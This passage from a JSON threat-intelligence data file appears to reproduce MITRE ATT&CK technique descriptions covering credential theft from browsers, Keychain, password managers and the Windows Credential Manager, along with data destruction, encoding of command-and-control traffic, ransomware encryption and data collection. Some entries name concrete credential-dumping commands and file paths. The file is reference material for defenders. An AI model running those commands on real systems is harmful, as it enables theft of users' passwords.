HawkEye Malware July 2017](https://app.tidalcyber.com/references/7ad228a8-5450-45ec-86fc-ea038f7c6ef7)] Windows stores Internet Explorer and Microsoft Edge credentials in Credential Lockers managed by the [Windows Credential Manager](https://app.tidalcyber.com/technique/9503955c-fa53-452a-b717-7e23bfb4df83).\n\nAdversaries may also acquire credentials by searching web browser process memory for patterns that commonly match credentials.[[GitHub Mimikittenz July 2016](https://app.tidalcyber.com/references/2e0a95b2-3f9a-4638-9bc5-ff1f3ac2af4b)]\n\nAfter acquiring credentials from web browsers, adversaries may attempt to recycle the credentials across different systems and/or accounts in order to expand access. This can result in significantly furthering an adversary's objective in cases where credentials gained from web browsers overlap with privileged accounts (e.g. domain administrator).", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1555.003" + }, + "related": [ + { + "dest-uuid": "0c3132d5-c0df-4793-b5f2-1a95bd64ab53", + "type": "uses" + } + ], + "uuid": "b4a1cbaa-85d1-4a65-977f-494f66a141e3", + "value": "Credentials from Web Browsers" + }, + { + "description": "Adversaries may acquire credentials from Keychain. Keychain (or Keychain Services) is the macOS credential management system that stores account names, passwords, private keys, certificates, sensitive application data, payment data, and secure notes. There are three types of Keychains: Login Keychain, System Keychain, and Local Items (iCloud) Keychain. The default Keychain is the Login Keychain, which stores user passwords and information. The System Keychain stores items accessed by the operating system, such as items shared among users on a host. The Local Items (iCloud) Keychain is used for items synced with Apple’s iCloud service. \n\nKeychains can be viewed and edited through the Keychain Access application or using the command-line utility security. Keychain files are located in ~/Library/Keychains/, /Library/Keychains/, and /Network/Library/Keychains/.[[Keychain Services Apple](https://app.tidalcyber.com/references/0754f48d-dad8-480c-953c-256be4dfcfc3)][[Keychain Decryption Passware](https://app.tidalcyber.com/references/6a426ab4-5b0b-46d4-9dfe-e2587f69e111)][[OSX Keychain Schaumann](https://app.tidalcyber.com/references/d0ac448a-7299-4ddc-8730-be72fb840ccb)]\n\nAdversaries may gather user credentials from Keychain storage/memory. For example, the command security dump-keychain –d will dump all Login Keychain credentials from ~/Library/Keychains/login.keychain-db. Adversaries may also directly read Login Keychain credentials from the ~/Library/Keychains/login.keychain file. Both methods require a password, where the default password for the Login Keychain is the current user’s password to login to the macOS host.[[External to DA, the OS X Way](https://app.tidalcyber.com/references/b714e6a9-5c12-4a3b-89f9-d379c0284f06)][[Empire Keychain Decrypt](https://app.tidalcyber.com/references/41075230-73a2-4195-b716-379f9e5ae93b)] ", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1555.001" + }, + "related": [ + { + "dest-uuid": "0c3132d5-c0df-4793-b5f2-1a95bd64ab53", + "type": "uses" + } + ], + "uuid": "1ef8a053-ff13-4a10-b9d9-0a017880e4a5", + "value": "Keychain" + }, + { + "description": "Adversaries may acquire user credentials from third-party password managers.[[ise Password Manager February 2019](https://app.tidalcyber.com/references/253104ab-20b0-43d2-8338-afdd3237cc53)] Password managers are applications designed to store user credentials, normally in an encrypted database. Credentials are typically accessible after a user provides a master password that unlocks the database. After the database is unlocked, these credentials may be copied to memory. These databases can be stored as files on disk.[[ise Password Manager February 2019](https://app.tidalcyber.com/references/253104ab-20b0-43d2-8338-afdd3237cc53)]\n\nAdversaries may acquire user credentials from password managers by extracting the master password and/or plain-text credentials from memory.[[FoxIT Wocao December 2019](https://app.tidalcyber.com/references/aa3e31c7-71cd-4a3f-b482-9049c9abb631)][[Github KeeThief](https://app.tidalcyber.com/references/3b6231fb-5b52-4a3a-a21f-0881901d0037)] Adversaries may extract credentials from memory via [Exploitation for Credential Access](https://app.tidalcyber.com/technique/afdfa503-0464-4b42-a79c-a6fc828492ef).[[NVD CVE-2019-3610](https://app.tidalcyber.com/references/889b742e-7572-4aad-8944-7f071483b613)]\n Adversaries may also try brute forcing via [Password Guessing](https://app.tidalcyber.com/technique/e849ebcc-e0af-45a5-aefa-c394bb759b4e) to obtain the master password of a password manager.[[Cyberreason Anchor December 2019](https://app.tidalcyber.com/references/a8dc5598-9963-4a1d-a473-bee8d2c72c57)]", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1555.005" + }, + "related": [ + { + "dest-uuid": "0c3132d5-c0df-4793-b5f2-1a95bd64ab53", + "type": "uses" + } + ], + "uuid": "9448cf6f-7ba3-41d1-8710-8e6f9b0572ee", + "value": "Password Managers" + }, + { + "description": "An adversary may obtain root access (allowing them to read securityd’s memory), then they can scan through memory to find the correct sequence of keys in relatively few tries to decrypt the user’s logon keychain. This provides the adversary with all the plaintext passwords for users, WiFi, mail, browsers, certificates, secure notes, etc.[[OS X Keychain](https://app.tidalcyber.com/references/bde3ff9c-fbf9-49c4-b414-70dc8356d57d)][[OSX Keydnap malware](https://app.tidalcyber.com/references/d43e0dd1-0946-4f49-bcc7-3ef38445eac3)]\n\nIn OS X prior to El Capitan, users with root access can read plaintext keychain passwords of logged-in users because Apple’s keychain implementation allows these credentials to be cached so that users are not repeatedly prompted for passwords.[[OS X Keychain](https://app.tidalcyber.com/references/bde3ff9c-fbf9-49c4-b414-70dc8356d57d)][[External to DA, the OS X Way](https://app.tidalcyber.com/references/b714e6a9-5c12-4a3b-89f9-d379c0284f06)] Apple’s securityd utility takes the user’s logon password, encrypts it with PBKDF2, and stores this master key in memory. Apple also uses a set of keys and algorithms to encrypt the user’s password, but once the master key is found, an adversary need only iterate over the other values to unlock the final password.[[OS X Keychain](https://app.tidalcyber.com/references/bde3ff9c-fbf9-49c4-b414-70dc8356d57d)]", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1555.002" + }, + "related": [ + { + "dest-uuid": "0c3132d5-c0df-4793-b5f2-1a95bd64ab53", + "type": "uses" + } + ], + "uuid": "fd75ec36-fc88-4bee-9fd9-480df6d1e765", + "value": "Securityd Memory" + }, + { + "description": "Adversaries may acquire credentials from the Windows Credential Manager. The Credential Manager stores credentials for signing into websites, applications, and/or devices that request authentication through NTLM or Kerberos in Credential Lockers (previously known as Windows Vaults).[[Microsoft Credential Manager store](https://app.tidalcyber.com/references/c949a29b-bb31-4bd7-a967-ddd48c7efb8e)][[Microsoft Credential Locker](https://app.tidalcyber.com/references/77505354-bb08-464c-9176-d0015a62c7c9)]\n\nThe Windows Credential Manager separates website credentials from application or network credentials in two lockers. As part of [Credentials from Web Browsers](https://app.tidalcyber.com/technique/b4a1cbaa-85d1-4a65-977f-494f66a141e3), Internet Explorer and Microsoft Edge website credentials are managed by the Credential Manager and are stored in the Web Credentials locker. Application and network credentials are stored in the Windows Credentials locker.\n\nCredential Lockers store credentials in encrypted `.vcrd` files, located under `%Systemdrive%\\Users\\\\[Username]\\AppData\\Local\\Microsoft\\\\[Vault/Credentials]\\`. The encryption key can be found in a file named Policy.vpol, typically located in the same folder as the credentials.[[passcape Windows Vault](https://app.tidalcyber.com/references/a8a56a64-8e73-4331-9961-b1f9b6cbb348)][[Malwarebytes The Windows Vault](https://app.tidalcyber.com/references/f09fdc31-38ca-411d-8478-683b08a68535)]\n\nAdversaries may list credentials managed by the Windows Credential Manager through several mechanisms. vaultcmd.exe is a native Windows executable that can be used to enumerate credentials stored in the Credential Locker through a command-line interface. Adversaries may also gather credentials by directly reading files located inside of the Credential Lockers. Windows APIs, such as CredEnumerateA, may also be absued to list credentials managed by the Credential Manager.[[Microsoft CredEnumerate](https://app.tidalcyber.com/references/ec3e7b3f-99dd-4f2f-885b-09d66b01fe3e)][[Delpy Mimikatz Crendential Manager](https://app.tidalcyber.com/references/24c6027b-e0d2-4c0c-83af-4536a631ea85)]\n\nAdversaries may also obtain credentials from credential backups. Credential backups and restorations may be performed by running rundll32.exe keymgr.dll KRShowKeyMgr then selecting the “Back up...” button on the “Stored User Names and Passwords” GUI.\n\nPassword recovery tools may also obtain plain text passwords from the Credential Manager.[[Malwarebytes The Windows Vault](https://app.tidalcyber.com/references/f09fdc31-38ca-411d-8478-683b08a68535)]", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1555.004" + }, + "related": [ + { + "dest-uuid": "0c3132d5-c0df-4793-b5f2-1a95bd64ab53", + "type": "uses" + } + ], + "uuid": "9503955c-fa53-452a-b717-7e23bfb4df83", + "value": "Windows Credential Manager" + }, + { + "description": "Adversaries may search for common password storage locations to obtain user credentials. Passwords are stored in several places on a system, depending on the operating system or application holding the credentials. There are also specific applications and services that store passwords to make them easier for users to manage and maintain, such as password managers and cloud secrets vaults. Once credentials are obtained, they can be used to perform lateral movement and access restricted information.", + "meta": { + "platforms": [ + "IaaS", + "Linux", + "macOS", + "Windows" + ], + "source": "MITRE", + "tags": [] + }, + "related": [ + { + "dest-uuid": "0c3132d5-c0df-4793-b5f2-1a95bd64ab53", + "type": "uses" + }, + { + "dest-uuid": "260571a6-3c08-5419-98c5-3fa1aa8e675d", + "type": "similar" + }, + { + "dest-uuid": "b4a1cbaa-85d1-4a65-977f-494f66a141e3", + "type": "similar" + }, + { + "dest-uuid": "1ef8a053-ff13-4a10-b9d9-0a017880e4a5", + "type": "similar" + }, + { + "dest-uuid": "9448cf6f-7ba3-41d1-8710-8e6f9b0572ee", + "type": "similar" + }, + { + "dest-uuid": "fd75ec36-fc88-4bee-9fd9-480df6d1e765", + "type": "similar" + }, + { + "dest-uuid": "9503955c-fa53-452a-b717-7e23bfb4df83", + "type": "similar" + } + ], + "uuid": "a0bb264e-8617-4ae6-bafd-f52b36c63d12", + "value": "Credentials from Password Stores" + }, + { + "description": "Adversaries may destroy data and files on specific systems or in large numbers on a network to interrupt availability to systems, services, and network resources. Data destruction is likely to render stored data irrecoverable by forensic techniques through overwriting files or data on local and remote drives.[[Symantec Shamoon 2012](https://app.tidalcyber.com/references/ac634e99-d951-402b-bb1c-e575753dfda8)][[FireEye Shamoon Nov 2016](https://app.tidalcyber.com/references/44b2eb6b-4902-4ca0-80e5-7333d620e075)][[Palo Alto Shamoon Nov 2016](https://app.tidalcyber.com/references/15007a87-a281-41ae-b203-fdafe02a885f)][[Kaspersky StoneDrill 2017](https://app.tidalcyber.com/references/e2637cb3-c449-4609-af7b-ac78a900cc8b)][[Unit 42 Shamoon3 2018](https://app.tidalcyber.com/references/c2148166-faf4-4ab7-a37e-deae0c88c08d)][[Talos Olympic Destroyer 2018](https://app.tidalcyber.com/references/25a2e179-7abd-4091-8af4-e9d2bf24ef11)] Common operating system file deletion commands such as del and rm often only remove pointers to files without wiping the contents of the files themselves, making the files recoverable by proper forensic methodology. This behavior is distinct from [Disk Content Wipe](https://app.tidalcyber.com/technique/761fa7fa-d7e1-4796-85b3-5cd37d55dffa) and [Disk Structure Wipe](https://app.tidalcyber.com/technique/14a944d3-ab95-40d8-b069-ccc4824ef46d) because individual files are destroyed rather than sections of a storage disk or the disk's logical structure.\n\nAdversaries may attempt to overwrite files and directories with randomly generated data to make it irrecoverable.[[Kaspersky StoneDrill 2017](https://app.tidalcyber.com/references/e2637cb3-c449-4609-af7b-ac78a900cc8b)][[Unit 42 Shamoon3 2018](https://app.tidalcyber.com/references/c2148166-faf4-4ab7-a37e-deae0c88c08d)] In some cases politically oriented image files have been used to overwrite data.[[FireEye Shamoon Nov 2016](https://app.tidalcyber.com/references/44b2eb6b-4902-4ca0-80e5-7333d620e075)][[Palo Alto Shamoon Nov 2016](https://app.tidalcyber.com/references/15007a87-a281-41ae-b203-fdafe02a885f)][[Kaspersky StoneDrill 2017](https://app.tidalcyber.com/references/e2637cb3-c449-4609-af7b-ac78a900cc8b)]\n\nTo maximize impact on the target organization in operations where network-wide availability interruption is the goal, malware designed for destroying data may have worm-like features to propagate across a network by leveraging additional techniques like [Valid Accounts](https://app.tidalcyber.com/technique/a9b7eb2f-63e7-41bc-9d77-f7c4cede5406), [OS Credential Dumping](https://app.tidalcyber.com/technique/368f85f9-2b15-4732-80fe-087694eaf34d), and [SMB/Windows Admin Shares](https://app.tidalcyber.com/technique/bc2f2c6c-ffe7-4e78-bbac-369f6781bbdd).[[Symantec Shamoon 2012](https://app.tidalcyber.com/references/ac634e99-d951-402b-bb1c-e575753dfda8)][[FireEye Shamoon Nov 2016](https://app.tidalcyber.com/references/44b2eb6b-4902-4ca0-80e5-7333d620e075)][[Palo Alto Shamoon Nov 2016](https://app.tidalcyber.com/references/15007a87-a281-41ae-b203-fdafe02a885f)][[Kaspersky StoneDrill 2017](https://app.tidalcyber.com/references/e2637cb3-c449-4609-af7b-ac78a900cc8b)][[Talos Olympic Destroyer 2018](https://app.tidalcyber.com/references/25a2e179-7abd-4091-8af4-e9d2bf24ef11)].\n\nIn cloud environments, adversaries may leverage access to delete cloud storage, cloud storage accounts, machine images, and other infrastructure crucial to operations to damage an organization or their customers.[[Data Destruction - Threat Post](https://app.tidalcyber.com/references/97d16d3a-98a0-4a7d-9f74-8877c8088ddf)][[DOJ - Cisco Insider](https://app.tidalcyber.com/references/b8d9006d-7466-49cf-a70e-384edee530ce)]", + "meta": { + "platforms": [ + "Containers", + "IaaS", + "Linux", + "macOS", + "Windows" + ], + "source": "MITRE", + "tags": [] + }, + "related": [ + { + "dest-uuid": "52c0edbc-ce4d-429a-b1d5-720403e0172f", + "type": "uses" + } + ], + "uuid": "e5016c2b-85fe-4e6b-917d-0dd5b441cc34", + "value": "Data Destruction" + }, + { + "description": "Adversaries may encode data with a non-standard data encoding system to make the content of command and control traffic more difficult to detect. Command and control (C2) information can be encoded using a non-standard data encoding system that diverges from existing protocol specifications. Non-standard data encoding schemes may be based on or related to standard data encoding schemes, such as a modified Base64 encoding for the message body of an HTTP request.[[Wikipedia Binary-to-text Encoding](https://app.tidalcyber.com/references/9b3820e8-f094-4e87-9ed6-ab0207d509fb)] [[Wikipedia Character Encoding](https://app.tidalcyber.com/references/3e7df20f-5d11-4102-851f-04e89c25d12f)] ", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1132.002" + }, + "related": [ + { + "dest-uuid": "94ffe549-1c29-438d-9c7f-e27f7acee0bb", + "type": "uses" + } + ], + "uuid": "0848222e-ddc2-489e-8ea4-e19634f6af34", + "value": "Non-Standard Encoding" + }, + { + "description": "Adversaries may encode data with a standard data encoding system to make the content of command and control traffic more difficult to detect. Command and control (C2) information can be encoded using a standard data encoding system that adheres to existing protocol specifications. Common data encoding schemes include ASCII, Unicode, hexadecimal, Base64, and MIME.[[Wikipedia Binary-to-text Encoding](https://app.tidalcyber.com/references/9b3820e8-f094-4e87-9ed6-ab0207d509fb)][[Wikipedia Character Encoding](https://app.tidalcyber.com/references/3e7df20f-5d11-4102-851f-04e89c25d12f)] Some data encoding systems may also result in data compression, such as gzip.", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1132.001" + }, + "related": [ + { + "dest-uuid": "94ffe549-1c29-438d-9c7f-e27f7acee0bb", + "type": "uses" + } + ], + "uuid": "972f0311-aec5-4fb5-bc5b-504c3f0cc95c", + "value": "Standard Encoding" + }, + { + "description": "Adversaries may encode data to make the content of command and control traffic more difficult to detect. Command and control (C2) information can be encoded using a standard data encoding system. Use of data encoding may adhere to existing protocol specifications and includes use of ASCII, Unicode, Base64, MIME, or other binary-to-text and character encoding systems.[[Wikipedia Binary-to-text Encoding](https://app.tidalcyber.com/references/9b3820e8-f094-4e87-9ed6-ab0207d509fb)] [[Wikipedia Character Encoding](https://app.tidalcyber.com/references/3e7df20f-5d11-4102-851f-04e89c25d12f)] Some data encoding systems may also result in data compression, such as gzip.", + "meta": { + "platforms": [ + "Linux", + "macOS", + "Windows" + ], + "source": "MITRE", + "tags": [] + }, + "related": [ + { + "dest-uuid": "94ffe549-1c29-438d-9c7f-e27f7acee0bb", + "type": "uses" + }, + { + "dest-uuid": "0848222e-ddc2-489e-8ea4-e19634f6af34", + "type": "similar" + }, + { + "dest-uuid": "972f0311-aec5-4fb5-bc5b-504c3f0cc95c", + "type": "similar" + } + ], + "uuid": "7d8af4f3-7d8e-4ef2-b828-40a910fc6188", + "value": "Data Encoding" + }, + { + "description": "Adversaries may encrypt data on target systems or on large numbers of systems in a network to interrupt availability to system and network resources. They can attempt to render stored data inaccessible by encrypting files or data on local and remote drives and withholding access to a decryption key. This may be done in order to extract monetary compensation from a victim in exchange for decryption or a decryption key (ransomware) or to render data permanently inaccessible in cases where the key is not saved or transmitted.[[US-CERT Ransomware 2016](https://app.tidalcyber.com/references/866484fa-836d-4c5b-bbad-3594ef60599c)][[FireEye WannaCry 2017](https://app.tidalcyber.com/references/34b15fe1-c550-4150-87bc-ac9662547247)][[US-CERT NotPetya 2017](https://app.tidalcyber.com/references/6a009850-834b-4178-9028-2745921b6743)][[US-CERT SamSam 2018](https://app.tidalcyber.com/references/b9d14fea-2330-4eed-892c-b4e05a35d273)]\n\nIn the case of ransomware, it is typical that common user files like Office documents, PDFs, images, videos, audio, text, and source code files will be encrypted (and often renamed and/or tagged with specific file markers). Adversaries may need to first employ other behaviors, such as [File and Directory Permissions Modification](https://app.tidalcyber.com/technique/cb2e4822-2529-4216-b5b8-75158c5f85ff) or [System Shutdown/Reboot](https://app.tidalcyber.com/technique/24787dca-6afd-4ab3-ab6c-32e9486ec418), in order to unlock and/or gain access to manipulate these files.[[CarbonBlack Conti July 2020](https://app.tidalcyber.com/references/3c3a6dc0-66f2-492e-8c9c-c0bcca73008e)] In some cases, adversaries may encrypt critical system files, disk partitions, and the MBR.[[US-CERT NotPetya 2017](https://app.tidalcyber.com/references/6a009850-834b-4178-9028-2745921b6743)] \n\nTo maximize impact on the target organization, malware designed for encrypting data may have worm-like features to propagate across a network by leveraging other attack techniques like [Valid Accounts](https://app.tidalcyber.com/technique/a9b7eb2f-63e7-41bc-9d77-f7c4cede5406), [OS Credential Dumping](https://app.tidalcyber.com/technique/368f85f9-2b15-4732-80fe-087694eaf34d), and [SMB/Windows Admin Shares](https://app.tidalcyber.com/technique/bc2f2c6c-ffe7-4e78-bbac-369f6781bbdd).[[FireEye WannaCry 2017](https://app.tidalcyber.com/references/34b15fe1-c550-4150-87bc-ac9662547247)][[US-CERT NotPetya 2017](https://app.tidalcyber.com/references/6a009850-834b-4178-9028-2745921b6743)] Encryption malware may also leverage [Internal Defacement](https://app.tidalcyber.com/technique/546a3318-0e03-4b22-95f5-c02ff69a4ebf), such as changing victim wallpapers, or otherwise intimidate victims by sending ransom notes or other messages to connected printers (known as \"print bombing\").[[NHS Digital Egregor Nov 2020](https://app.tidalcyber.com/references/92f74037-2a20-4667-820d-2ccc0e4dbd3d)]\n\nIn cloud environments, storage objects within compromised accounts may also be encrypted.[[Rhino S3 Ransomware Part 1](https://app.tidalcyber.com/references/bb28711f-186d-4101-b153-6340ce826343)]", + "meta": { + "platforms": [ + "IaaS", + "Linux", + "macOS", + "Windows" + ], + "source": "MITRE", + "tags": [] + }, + "related": [ + { + "dest-uuid": "52c0edbc-ce4d-429a-b1d5-720403e0172f", + "type": "uses" + } + ], + "uuid": "f0c36d24-263c-4811-8784-f716c77ec6b3", + "value": "Data Encrypted for Impact" + }, + { + "description": "Adversaries may access data from cloud storage.\n\nMany IaaS providers offer solutions for online data object storage such as Amazon S3, Azure Storage, and Google Cloud Storage. Similarly, SaaS enterprise platforms such as Office 365 and Google Workspace provide cloud-based document storage to users through services such as OneDrive and Google Drive, while SaaS application providers such as Slack, Confluence, Salesforce, and Dropbox may provide cloud storage solutions as a peripheral or primary use case of their platform. \n\nIn some cases, as with IaaS-based cloud storage, there exists no overarching application (such as SQL or Elasticsearch) with which to interact with the stored objects: instead, data from these solutions is retrieved directly though the [Cloud API](https://app.tidalcyber.com/technique/af798e80-2cc5-5452-83e4-9560f08bf2d5). In SaaS applications, adversaries may be able to collect this data directly from APIs or backend cloud storage objects, rather than through their front-end application or interface (i.e., [Data from Information Repositories](https://app.tidalcyber.com/technique/08a73f37-a04e-46be-9409-b330cbe291b4)). \n\nAdversaries may collect sensitive data from these cloud storage solutions. Providers typically offer security guides to help end users configure systems, though misconfigurations are a common problem.[[Amazon S3 Security, 2019](https://app.tidalcyber.com/references/4c434ca5-2544-45e0-82d9-71343d8aa960)][[Microsoft Azure Storage Security, 2019](https://app.tidalcyber.com/references/95bda448-bb13-4fa6-b663-e48a9d1b866f)][[Google Cloud Storage Best Practices, 2019](https://app.tidalcyber.com/references/752ad355-0f10-4c8d-bad8-42bf2fc75fa0)] There have been numerous incidents where cloud storage has been improperly secured, typically by unintentionally allowing public access to unauthenticated users, overly-broad access by all users, or even access for any anonymous person outside the control of the Identity Access Management system without even needing basic user permissions.\n\nThis open access may expose various types of sensitive data, such as credit cards, personally identifiable information, or medical records.[[Trend Micro S3 Exposed PII, 2017](https://app.tidalcyber.com/references/1ba37b48-1219-4f87-af36-9bdd8d6265ca)][[Wired Magecart S3 Buckets, 2019](https://app.tidalcyber.com/references/47fb06ed-b4ce-454c-9bbe-21b28309f351)][[HIPAA Journal S3 Breach, 2017](https://app.tidalcyber.com/references/b0fbf593-4aeb-4167-814b-ed3d4479ded0)][[Rclone-mega-extortion_05_2021](https://app.tidalcyber.com/references/9b492a2f-1326-4733-9c0e-a9454bf7fabb)]\n\nAdversaries may also obtain then abuse leaked credentials from source repositories, logs, or other means as a way to gain access to cloud storage objects.", + "meta": { + "platforms": [ + "Google Workspace", + "IaaS", + "Office 365", + "SaaS" + ], + "source": "MITRE", + "tags": [] + }, + "related": [ + { + "dest-uuid": "1ca65327-b553-4923-ae19-8e6987ca250a", + "type": "uses" + } + ], + "uuid": "77069b3f-9e42-4f1b-894f-8df568233df2", + "value": "Data from Cloud Storage" + }, + { + "description": "Adversaries may access network configuration files to collect sensitive data about the device and the network. The network configuration is a file containing parameters that determine the operation of the device. The device typically stores an in-memory copy of the configuration while operating, and a separate configuration on non-volatile storage to load after device reset. Adversaries can inspect the configuration files to reveal information about the target network and its layout, the network device and its software, or identifying legitimate accounts and credentials for later use.\n\nAdversaries can use common management tools and protocols, such as Simple Network Management Protocol (SNMP) and Smart Install (SMI), to access network configuration files.[[US-CERT TA18-106A Network Infrastructure Devices 2018](https://app.tidalcyber.com/references/8fdf280d-680f-4b8f-8fb9-6b3118ec3983)][[Cisco Blog Legacy Device Attacks](https://app.tidalcyber.com/references/f7ce5099-7e04-4c0b-8767-e0eec664b18e)] These tools may be used to query specific data from a configuration repository or configure the device to export the configuration for later analysis. ", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1602.002" + }, + "related": [ + { + "dest-uuid": "1ca65327-b553-4923-ae19-8e6987ca250a", + "type": "uses" + } + ], + "uuid": "0d5a5921-f643-4032-9a4a-0bb693822c21", + "value": "Network Device Configuration Dump" + }, + { + "description": "Adversaries may target the Management Information Base (MIB) to collect and/or mine valuable information in a network managed using Simple Network Management Protocol (SNMP).\n\nThe MIB is a configuration repository that stores variable information accessible via SNMP in the form of object identifiers (OID). Each OID identifies a variable that can be read or set and permits active management tasks, such as configuration changes, through remote modification of these variables. SNMP can give administrators great insight in their systems, such as, system information, description of hardware, physical location, and software packages[[SANS Information Security Reading Room Securing SNMP Securing SNMP](https://app.tidalcyber.com/references/616c9177-ca57-45f3-a613-d6450a94697d)]. The MIB may also contain device operational information, including running configuration, routing table, and interface details.\n\nAdversaries may use SNMP queries to collect MIB content directly from SNMP-managed devices in order to collect network information that allows the adversary to build network maps and facilitate future targeted exploitation.[[US-CERT-TA18-106A](https://app.tidalcyber.com/references/1fe55557-94af-4697-a675-884701f70f2a)][[Cisco Blog Legacy Device Attacks](https://app.tidalcyber.com/references/f7ce5099-7e04-4c0b-8767-e0eec664b18e)] ", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1602.001" + }, + "related": [ + { + "dest-uuid": "1ca65327-b553-4923-ae19-8e6987ca250a", + "type": "uses" + } + ], + "uuid": "8510638d-5be4-4986-a11c-dcbdc729a50f", + "value": "SNMP (MIB Dump)" + }, + { + "description": "Adversaries may collect data related to managed devices from configuration repositories. Configuration repositories are used by management systems in order to configure, manage, and control data on remote systems. Configuration repositories may also facilitate remote access and administration of devices.\n\nAdversaries may target these repositories in order to collect large quantities of sensitive system administration data. Data from configuration repositories may be exposed by various protocols and software and can store a wide variety of data, much of which may align with adversary Discovery objectives.[[US-CERT-TA18-106A](https://app.tidalcyber.com/references/1fe55557-94af-4697-a675-884701f70f2a)][[US-CERT TA17-156A SNMP Abuse 2017](https://app.tidalcyber.com/references/82b814f3-2853-48a9-93ff-701d16d97535)]", + "meta": { + "platforms": [ + "Network" + ], + "source": "MITRE", + "tags": [] + }, + "related": [ + { + "dest-uuid": "1ca65327-b553-4923-ae19-8e6987ca250a", + "type": "uses" + }, + { + "dest-uuid": "0d5a5921-f643-4032-9a4a-0bb693822c21", + "type": "similar" + }, + { + "dest-uuid": "8510638d-5be4-4986-a11c-dcbdc729a50f", + "type": "similar" + } + ], + "uuid": "97ef6135-47d4-4b91-8783-c0b5f331340e", + "value": "Data from Configuration Repository" + }, + { + "description": "Adversaries may leverage code repositories to collect valuable information. Code repositories are tools/services that store source code and automate software builds. They may be hosted internally or privately on third party sites such as Github, GitLab, SourceForge, and BitBucket. Users typically interact with code repositories through a web application or command-line utilities such as git.\n\nOnce adversaries gain access to a victim network or a private code repository, they may collect sensitive information such as proprietary source code or credentials contained within software's source code. Having access to software's source code may allow adversaries to develop [Exploits](https://app.tidalcyber.com/technique/5a57d258-0b23-431b-b50e-3150d2c0e52c), while credentials may provide access to additional resources using [Valid Accounts](https://app.tidalcyber.com/technique/a9b7eb2f-63e7-41bc-9d77-f7c4cede5406).[[Wired Uber Breach](https://app.tidalcyber.com/references/3bdf88b3-8f41-4945-9292-e299bab4f98e)][[Krebs Adobe](https://app.tidalcyber.com/references/bc2b0b89-e00d-4beb-bf27-fe81d8c826a4)]\n\n**Note:** This is distinct from [Code Repositories](https://app.tidalcyber.com/technique/2e4201da-fe83-439d-9d40-87e4c1f832fb), which focuses on conducting [Reconnaissance](https://app.tidalcyber.com/tactics/2706dc98-724b-4cf0-84b6-56cc20b0698e) via public code repositories.", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1213.003" + }, + "related": [ + { + "dest-uuid": "1ca65327-b553-4923-ae19-8e6987ca250a", + "type": "uses" + } + ], + "uuid": "fe595943-f264-4d05-a8c7-7afc8985bfc3", + "value": "Code Repositories" + }, + { + "description": "\nAdversaries may leverage Confluence repositories to mine valuable information. Often found in development environments alongside Atlassian JIRA, Confluence is generally used to store development-related documentation, however, in general may contain more diverse categories of useful information, such as:\n\n* Policies, procedures, and standards\n* Physical / logical network diagrams\n* System architecture diagrams\n* Technical system documentation\n* Testing / development credentials\n* Work / project schedules\n* Source code snippets\n* Links to network shares and other internal resources\n", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1213.001" + }, + "related": [ + { + "dest-uuid": "1ca65327-b553-4923-ae19-8e6987ca250a", + "type": "uses" + } + ], + "uuid": "3cc64d61-7922-4e08-98ff-b76cb2173830", + "value": "Confluence" + }, + { + "description": "Adversaries may leverage the SharePoint repository as a source to mine valuable information. SharePoint will often contain useful information for an adversary to learn about the structure and functionality of the internal network and systems. For example, the following is a list of example information that may hold potential value to an adversary and may also be found on SharePoint:\n\n* Policies, procedures, and standards\n* Physical / logical network diagrams\n* System architecture diagrams\n* Technical system documentation\n* Testing / development credentials\n* Work / project schedules\n* Source code snippets\n* Links to network shares and other internal resources\n", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1213.002" + }, + "related": [ + { + "dest-uuid": "1ca65327-b553-4923-ae19-8e6987ca250a", + "type": "uses" + } + ], + "uuid": "8ac6952d-5add-4cbc-ad39-44943ed3459b", + "value": "Sharepoint" + }, + { + "description": "Adversaries may leverage information repositories to mine valuable information. Information repositories are tools that allow for storage of information, typically to facilitate collaboration or information sharing between users, and can store a wide variety of data that may aid adversaries in further objectives, or direct access to the target information. Adversaries may also abuse external sharing features to share sensitive documents with recipients outside of the organization. \n\nThe following is a brief list of example information that may hold potential value to an adversary and may also be found on an information repository:\n\n* Policies, procedures, and standards\n* Physical / logical network diagrams\n* System architecture diagrams\n* Technical system documentation\n* Testing / development credentials\n* Work / project schedules\n* Source code snippets\n* Links to network shares and other internal resources\n\nInformation stored in a repository may vary based on the specific instance or environment. Specific common information repositories include web-based platforms such as [Sharepoint](https://app.tidalcyber.com/technique/8ac6952d-5add-4cbc-ad39-44943ed3459b) and [Confluence](https://app.tidalcyber.com/technique/3cc64d61-7922-4e08-98ff-b76cb2173830), specific services such as Code Repositories, IaaS databases, enterprise databases, and other storage infrastructure such as SQL Server.", + "meta": { + "platforms": [ + "Google Workspace", + "IaaS", + "Linux", + "macOS", + "Office 365", + "SaaS", + "Windows" + ], + "source": "MITRE", + "tags": [] + }, + "related": [ + { + "dest-uuid": "1ca65327-b553-4923-ae19-8e6987ca250a", + "type": "uses" + }, + { + "dest-uuid": "fe595943-f264-4d05-a8c7-7afc8985bfc3", + "type": "similar" + }, + { + "dest-uuid": "3cc64d61-7922-4e08-98ff-b76cb2173830", + "type": "similar" + }, + { + "dest-uuid": "8ac6952d-5add-4cbc-ad39-44943ed3459b", + "type": "similar" + } + ], + "uuid": "08a73f37-a04e-46be-9409-b330cbe291b4", + "value": "Data from Information Repositories" + }, + { + "description": "Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.\n\nAdversaries may do this using a [Command and Scripting Interpreter](https://app.tidalcyber.com/technique/a2184d53-63b1-4c40-81ed-da799080c36c), such as [cmd](https://app.tidalcyber.com/software/98d89476-63ec-4baf-b2b3-86c52170f5d8) as well as a [Network Device CLI](https://app.tidalcyber.com/technique/284bfbb3-99f0-4c3d-bc1f-ab74065b7907), which have functionality to interact with the file system to gather information.[[show_run_config_cmd_cisco](https://app.tidalcyber.com/references/5a68a45a-a53e-5d73-a82a-0cc951071aef)] Adversaries may also use [Automated Collection](https://app.tidalcyber.com/technique/107ad6c5-79b1-468c-9519-1578bee2ac49) on the local system.\n", + "meta": { + "platforms": [ + "Linux", + 